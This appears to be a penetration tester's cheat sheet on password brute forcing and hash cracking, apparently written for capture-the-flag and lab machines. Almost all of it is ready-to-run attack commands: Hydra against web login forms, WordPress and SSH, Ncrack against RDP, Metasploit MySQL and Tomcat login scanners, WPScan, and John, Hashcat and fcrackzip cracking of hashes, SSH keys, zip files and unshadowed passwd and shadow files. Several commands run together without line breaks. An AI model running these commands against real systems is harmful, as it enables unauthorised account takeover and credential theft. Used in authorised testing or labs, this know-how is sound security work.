Brute Force Password Attacks & Cracking
John The Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt -format=$format hash.txtHydra
To brute force the web form using Hydra the following information is required:
IP address
GET/POST request: http-get-form or http-post-form
Username: -l for a static username or -L for a list of usernames
Password: -p for a static password or -P for a password list
Number of threads is optional: -t
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error"
hydra -l admin -P /usr/share/wordlist/rockyou.txt -vV -f -t 2 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:login_error
hydra $ip -l $username -P [password list] [http form type] ":hydra -L <username list> -p <password list> [host] http-post-form "::"hydra -L <wordlist> -P <password list> [host] http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login failed"hydra -l [username] -P /usr/share/wordlists/rockyou.txt [host] http-post-form "/wp-admin/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=http%3A%2F%2F[host]%2Fwp-admin%2F" -Vhydra -l root -P /usr/share/wordlists/fasttrack.txt [host] sshhydra -s 22022 -l root -P /usr/share/wordlists/fasttrack.txt [host] sshhydra -s 22022 -L userlist.txt -P /usr/share/wordlists/fasttrack.txt [host] ssh -t 4 -vhydra $TARGET http-post-form -L /usr/share/wordlists/list "/endpoit/login:usernameField=^USER^&passwordField=^PASS^:unsuccessfulMessage" -s PORT -P /usr/share/wordlists/listHashcat
hashcat -m $hashtype -a $attackmode -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txthashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt --forcemis the hash format (e.g. m 13100 is Kerberos 5)a 0is a dictionary attacko cracked.txtis the output file for the cracked passwordtarget_hashes.txtis the hash to be cracked/usr/share/wordlists/rockyou.txtis the absolute path to the wordlist--forceis something I always have to add (think it's GPU-related)
Ncrack
Ncrack can be used to crack RDP passwords:
ncrack -vv --user username -P password-file.txt rdp://[host]msf > use auxiliary/scanner/mysql/mysql_loginmsf auxiliary(mysql_login) > set rhosts [target]msf auxiliary(mysql_login) > set rport [port]msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txtmsf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txtmsf auxiliary(mysql_login) > runBy default, Metasploit will use its list of default Tomcat usernames and passwords, but you could set a single username with set username or run a custom list with set user_file. You can also run a longer password list with set pass_file. Depending on how fast the server responds, you could use a big wordlist but otherwise stick to fasttrack.txt.
msf > use auxiliary/scanner/http/tomcat_mgr_loginmsf auxiliary(tomcat_mgr_login) > set rhosts [target]msf auxiliary(tomcat_mgr_login) > set rport [port, usually 8080]msf auxiliary(tomcat_mgr_login) > set ssl truemsf auxiliary(tomcat_mgr_login) > set stop_on_success truemsf auxiliary(tomcat_mgr_login) > runCracking Wordpress Password with WPScan
wpscan --url http://blog.thm -P /usr/share/wordlists/rockyou.txt -U username.txt -t 75Crack Zipfiles
https://www.geeksforgeeks.org/recover-password-password-protected-zip-file/
fcrackzip -v -D -u -p /usr/share/dict/words secret.zipFind SSH Keyphrase with John - Crack SSH Private Key
First we’ll need to convert the ssh key using ssh2john with this command. Crack ssh.
python ssh2john.py SecretKey > SecretKey.hash
#After give it to john…
sudo john SecretKey.hash -wordlist=INSERTWORDLIST!Crack shadow or Passwd File
unshadow passwd.txt shadow.txt > passwords.txt
john --wordlist=/usr/share/wordlists/sqlmap.txt passwords.txt
john --show passwords.txtLast updated
Was this helpful?